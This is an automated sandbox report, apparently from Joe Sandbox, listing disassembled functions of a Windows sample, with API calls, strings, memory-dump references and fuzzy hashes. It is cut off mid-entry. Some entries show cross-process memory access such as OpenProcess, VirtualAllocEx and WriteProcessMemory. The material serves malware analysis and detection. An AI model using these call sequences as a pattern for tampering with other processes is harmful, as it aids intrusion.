SelectObject.GDI32(?,00000000), ref: 0041B033

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: 7c4a71da7bb7c6b92ed87e99b55654c99fda81b73bae783c331b6063b13b5e52
Instruction ID: a68afc14fff29162dc6faf8435a876086fec7fed57c06213cce97e3b8c98d3b8
Opcode Fuzzy Hash: 7c4a71da7bb7c6b92ed87e99b55654c99fda81b73bae783c331b6063b13b5e52
Instruction Fuzzy Hash: E8216070901305AFDB109F55EC88BDE7B68FB16355F14432BE425962B1C37488968B99

Function 0042217F Relevance: 7.6, APIs: 5, Instructions: 61threadCOMMON

Download Yara Rule

APIs

__calloc_crt.LIBCMT ref: 004221A9
CreateThread.KERNEL32(?,?,004222DF,00000000,?,?), ref: 004221ED
GetLastError.KERNEL32 ref: 004221F7
_free.LIBCMT ref: 00422200
__dosmaperr.LIBCMT ref: 0042220B

Part of subcall function 00427C0E: __getptd_noexit.LIBCMT ref: 00427C0E

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: CreateErrorLastThread__calloc_crt__dosmaperr__getptd_noexit_free
String ID:
API String ID: 2664167353-0
Opcode ID: b577d23ff17bb257158cb178ca2e5ddb2cfcc24d53dfb603d5ff8a8f62ba1d95
Instruction ID: c22bb6fff56d961d5c9c29188316b6b7028ddab09764e3de592cdea5f7742925
Opcode Fuzzy Hash: b577d23ff17bb257158cb178ca2e5ddb2cfcc24d53dfb603d5ff8a8f62ba1d95
Instruction Fuzzy Hash: 79112932304326BF9B10AFA6BD41D6B3798EF00734750042FF91497192DBBA981187A8

Function 0043ABBB Relevance: 7.5, APIs: 5, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0043ABD7
GetLastError.KERNEL32(?,0043A69F,?,?,?), ref: 0043ABE1
GetProcessHeap.KERNEL32(00000008,?,?,0043A69F,?,?,?), ref: 0043ABF0
RtlAllocateHeap.KERNEL32(00000000,?,0043A69F,?,?,?), ref: 0043ABF7
GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0043AC0E

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: HeapObjectSecurityUser$AllocateErrorLastProcess
String ID:
API String ID: 883493501-0
Opcode ID: 1105c51a95b9c4985460d9023d3962ffaa69d09a53960c860975f241e157bdbc
Instruction ID: 9a6f70c041a44a4f9a827da56d6e218984a148510de144741497beb3d206d3d0
Opcode Fuzzy Hash: 1105c51a95b9c4985460d9023d3962ffaa69d09a53960c860975f241e157bdbc
Instruction Fuzzy Hash: D4016970641204BFDB115FA9EC8CDAB3BACFF8A354B10182EF955D32A0DA718C50CB68

Function 00447A58 Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00447A74
QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00447A82
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00447A8A
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00447A94
Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00447AD0

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: 9096d10b09d4d2df299d12543b3ca86d9efde44fc0486633c2803926555982e9
Instruction ID: 9df7a410ece83edb3699c7793a5c23df94053d579fcd3f16084c42eae6cef0d8
Opcode Fuzzy Hash: 9096d10b09d4d2df299d12543b3ca86d9efde44fc0486633c2803926555982e9
Instruction Fuzzy Hash: 19018071C05619DBDF00AFE4DC4C9DDBB78FF08711F00495AD502B2290DB389651C7A9

Function 00439ABF Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32 ref: 00439ADC
ProgIDFromCLSID.OLE32(?,00000000), ref: 00439AF7
lstrcmpiW.KERNEL32(?,00000000), ref: 00439B05
CoTaskMemFree.OLE32(00000000,?,00000000), ref: 00439B15
CLSIDFromString.OLE32(?,?), ref: 00439B21

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: From$Prog$FreeStringTasklstrcmpi
String ID:
API String ID: 3897988419-0
Opcode ID: 89d454ae4780ac1dd4fe31ccf9d2996fb633b50112b37b9739d33278ec798fca
Instruction ID: 87913f96beddb0d4d16c11972130365a8c83d4fec8f93c347dd2fca7273abf86
Opcode Fuzzy Hash: 89d454ae4780ac1dd4fe31ccf9d2996fb633b50112b37b9739d33278ec798fca
Instruction Fuzzy Hash: 3E018F76A01204BFDB105F58EC44B9EBBEDEB4C352F144439F905D2250D7B4ED009BA4

Function 0043AA62 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 0043AA79
GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 0043AA83
GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 0043AA92
RtlAllocateHeap.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 0043AA99
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0043AAAF

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: HeapInformationToken$AllocateErrorLastProcess
String ID:
API String ID: 47921759-0
Opcode ID: 005e3d2c3a84d1d8d797b66e4ccb948516923a2946e7af749364c39d3cf5c40b
Instruction ID: 974b26daf64f8dbf61396155943fd57f6b72a90fe55d440549507bfb75707d11
Opcode Fuzzy Hash: 005e3d2c3a84d1d8d797b66e4ccb948516923a2946e7af749364c39d3cf5c40b
Instruction Fuzzy Hash: 91F0AF322412046FEB102FA4AC8CE6B3BACFF4E754F10082EF941C7290DB619C15CB65

Function 0043AAC3 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0043AADA
GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0043AAE4
GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0043AAF3
RtlAllocateHeap.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0043AAFA
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0043AB10

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: HeapInformationToken$AllocateErrorLastProcess
String ID:
API String ID: 47921759-0
Opcode ID: b3c430549ea03a9ae663836329f0cbd350e6d7a8f5d55abe0fc1a4013e99c131
Instruction ID: 146aa33a93239cb99623a1635ed7780d23d82dc7e0fdc4ba1386104819eb8aef
Opcode Fuzzy Hash: b3c430549ea03a9ae663836329f0cbd350e6d7a8f5d55abe0fc1a4013e99c131
Instruction Fuzzy Hash: A3F04F71641208AFEB110FA4EC8CE6B7B6DFF4A754F10053EFA51C7290DB65AC118B65

Function 0043EC80 Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 0043EC94
GetWindowTextW.USER32(00000000,?,00000100), ref: 0043ECAB
MessageBeep.USER32(00000000), ref: 0043ECC3
KillTimer.USER32(?,0000040A), ref: 0043ECDF
EndDialog.USER32(?,00000001), ref: 0043ECF9

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: BeepDialogItemKillMessageTextTimerWindow
String ID:
API String ID: 3741023627-0
Opcode ID: a4357b5e30fb9fe67f4be092913bd6825b4be062f9c32e96e3c3d0623023620a
Instruction ID: 98597da713e12d6dfb059cec58a8c53e20aa62e351f3c557d6efc3328c67b8a1
Opcode Fuzzy Hash: a4357b5e30fb9fe67f4be092913bd6825b4be062f9c32e96e3c3d0623023620a
Instruction Fuzzy Hash: 28018630901704ABEB245B51DE4EB9A7778FF04705F00196EB543714E1DBF4A945CB48

Function 0041B0AB Relevance: 7.5, APIs: 5, Instructions: 29COMMON

Download Yara Rule

APIs

EndPath.GDI32(?), ref: 0041B0BA
StrokeAndFillPath.GDI32(?,?,0047E680,00000000,?,?,?), ref: 0041B0D6
SelectObject.GDI32(?,00000000), ref: 0041B0E9
DeleteObject.GDI32 ref: 0041B0FC
StrokePath.GDI32(?), ref: 0041B117

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: Path$ObjectStroke$DeleteFillSelect
String ID:
API String ID: 2625713937-0
Opcode ID: 186640bc092136c8836b36fd74f5553999f6ef9858cf0f45e654f2fc4a48aff1
Instruction ID: 305292cf3701eb74ee210533d413ef74276f9a5688495286bd354ebed6b62e2e
Opcode Fuzzy Hash: 186640bc092136c8836b36fd74f5553999f6ef9858cf0f45e654f2fc4a48aff1
Instruction Fuzzy Hash: F8F01930201204EFCB61AF65EC4CB993F65EB02366F088329E465841F2C7348996DF5C

Function 0044F23D Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 277comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 0044F2DA
CoCreateInstance.OLE32(0048DA7C,00000000,00000001,0048D8EC,?), ref: 0044F2F2
CoUninitialize.OLE32 ref: 0044F555

Strings

.lnk, xrefs: 0044F28B, 0044F290, 0044F29E

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize
String ID: .lnk
API String ID: 948891078-24824748
Opcode ID: 81dbf9ed2543da613c77d7bef0e01e818b87c6a9cd27bbee5f6acd628e7327a1
Instruction ID: 4d7391de075464714a8c3291d240941207e243e8aeb7da400a877c7a430c7a2f
Opcode Fuzzy Hash: 81dbf9ed2543da613c77d7bef0e01e818b87c6a9cd27bbee5f6acd628e7327a1
Instruction Fuzzy Hash: ACA14DB1504201AFD300EF65C881EAFB7ECEF98318F00492EF55597192EB74EA49CB96

Function 0044E7DD Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON

Download Yara Rule

APIs

Part of subcall function 0040660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,004053B1,?,?,004061FF,?,00000000,00000001,00000000), ref: 0040662F

CoInitialize.OLE32(00000000), ref: 0044E85D
CoCreateInstance.OLE32(0048DA7C,00000000,00000001,0048D8EC,?), ref: 0044E876
CoUninitialize.OLE32 ref: 0044E893

Part of subcall function 0040936C: __swprintf.LIBCMT ref: 004093AB
Part of subcall function 0040936C: __itow.LIBCMT ref: 004093DF

Strings

.lnk, xrefs: 0044E83B, 0044E84D

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
String ID: .lnk
API String ID: 2126378814-24824748
Opcode ID: b41776f7e27376259126802139b15c544f7a21ad51d83b307521d4d948d136fa
Instruction ID: 10c43b87b23ce4038536d43f928ead2d0a8ecdf508b023c31232c5178fa219cf
Opcode Fuzzy Hash: b41776f7e27376259126802139b15c544f7a21ad51d83b307521d4d948d136fa
Instruction Fuzzy Hash: 7EA166756043019FDB10EF25C48491EBBE5BF88314F14895EF996AB3A2CB35EC45CB85

Function 0042325D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 004232ED

Part of subcall function 0042E0D0: __87except.LIBCMT ref: 0042E10B

Strings

pow, xrefs: 004232C5, 004232E2

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: ErrorHandling__87except__start
String ID: pow
API String ID: 2905807303-2276729525
Opcode ID: 1fda4fbb42dc3b36c5c190533d3c43eac553db1d2182f2045c8b461978330a63
Instruction ID: 1a21917130ddbb47f9248a99b6df19eade1bd1d8620e4c39e32b257b59b9eced
Opcode Fuzzy Hash: 1fda4fbb42dc3b36c5c190533d3c43eac553db1d2182f2045c8b461978330a63
Instruction Fuzzy Hash: 43515961B08221D2CB15BF15F90137B2BA49B40711FE04DBBE8C6823E9DF7C8E95965E

Function 00444606 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 122COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(0000000C,00000016,00000016,00000000,00000000,?,00000000,0049DC50,?,0000000F,0000000C,00000016,0049DC50,?), ref: 00444645

Part of subcall function 0040936C: __swprintf.LIBCMT ref: 004093AB
Part of subcall function 0040936C: __itow.LIBCMT ref: 004093DF

CharUpperBuffW.USER32(?,?,00000000,?), ref: 004446C5

Strings

THIS, xrefs: 00444703
REMOVE, xrefs: 00444676

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: BuffCharUpper$__itow__swprintf
String ID: REMOVE$THIS
API String ID: 3797816924-776492005
Opcode ID: fbefdce5a163b64322f3fc20a3cb374916d2128bf38069e792ad8926594cfb1a
Instruction ID: 598861723889322f2b36ecddc1b796b6f6d96aabc3fe50002778cc507f541961
Opcode Fuzzy Hash: fbefdce5a163b64322f3fc20a3cb374916d2128bf38069e792ad8926594cfb1a
Instruction Fuzzy Hash: DE419874A001199FDF00DF65C881AAEB7B5FF89308F14806EE915AB392DB38DD46CB58

Function 0043C189 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0044430B: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,0043BC08,?,?,00000034,00000800,?,00000034), ref: 00444335

SendMessageW.USER32(?,00001104,00000000,00000000), ref: 0043C1D3

Part of subcall function 004442D6: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,0043BC37,?,?,00000800,?,00001073,00000000,?,?), ref: 00444300

Part of subcall function 0044422F: GetWindowThreadProcessId.USER32(?,?), ref: 0044425A
Part of subcall function 0044422F: OpenProcess.KERNEL32(00000438,00000000,?,?,?,0043BBCC,00000034,?,?,00001004,00000000,00000000), ref: 0044426A
Part of subcall function 0044422F: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,0043BBCC,00000034,?,?,00001004,00000000,00000000), ref: 00444280

SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0043C240
SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0043C28D

Strings

@, xrefs: 0043C2A5

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
String ID: @
API String ID: 4150878124-2766056989
Opcode ID: ae477d9df93bac96d9bb21d4aeb4c3ee73f37a213a0a1487a1f49a80afdf1839
Instruction ID: 3f4c4a65faee7a5d8857929f5e28f96f4fee7115f0a52c3415428020ef33ee1d
Opcode Fuzzy Hash: ae477d9df93bac96d9bb21d4aeb4c3ee73f37a213a0a1487a1f49a80afdf1839
Instruction Fuzzy Hash: 0C413976A0021CAFDB10DFA4CD81BEEB7B8BF49704F00409AFA45B7181DA756E45CB65

Function 0046A63F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0049DC00,00000000,?,?,?,?), ref: 0046A6D8
GetWindowLongW.USER32 ref: 0046A6F5
SetWindowLongW.USER32(?,000000F0,00000000), ref: 0046A705

Strings

SysTreeView32, xrefs: 0046A6AA

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: Window$Long
String ID: SysTreeView32
API String ID: 847901565-1698111956
Opcode ID: a2a74fddaa6c3cd3c03317601c7c16233c3959efa95fba5e0452c389bbffce1a
Instruction ID: e35dea41237fcbc3d60db0d7b0801f268ac0ee7baed950b9ceceedc0e64d78fd
Opcode Fuzzy Hash: a2a74fddaa6c3cd3c03317601c7c16233c3959efa95fba5e0452c389bbffce1a
Instruction Fuzzy Hash: FD31B231601605ABDB118E34CC41BEB77A9EF49324F24472AF875A32E1D738E8609B5A

Function 00455180 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 96networkCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00455190
InternetCrackUrlW.WININET(?,00000000,00000000,?), ref: 004551C6

Strings

DE, xrefs: 0045522E
|, xrefs: 004551B5

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: CrackInternet_memset
String ID: |$DE
API String ID: 1413715105-2586410654
Opcode ID: cb3efb7376b2ee8b3b9d292cd61c4e768093f9ed3e25bdc4c130753edd66b9fc
Instruction ID: 7ff0a5d39f7edaf8f80adf74e6cb1badfa182ff46140bd3db269d441b7208e6c
Opcode Fuzzy Hash: cb3efb7376b2ee8b3b9d292cd61c4e768093f9ed3e25bdc4c130753edd66b9fc
Instruction Fuzzy Hash: 66311871C00119ABCF01AFE5CD85AEE7FB9FF18704F00016AF815B6166DA35A916DBA4

Function 0046A0D6 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 89windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001009,00000000,?), ref: 0046A15E
SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 0046A172
SendMessageW.USER32(?,00001002,00000000,?), ref: 0046A196

Strings

SysMonthCal32, xrefs: 0046A129

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: MessageSend$Window
String ID: SysMonthCal32
API String ID: 2326795674-1439706946
Opcode ID: 416cc77b0198d72f98cea775319e80d4bf96db53c998f8ae22c1170698be4b66
Instruction ID: 2be483add4762aa6c11c59ba3fc8898740279692600701ed87bb33f31a59144f
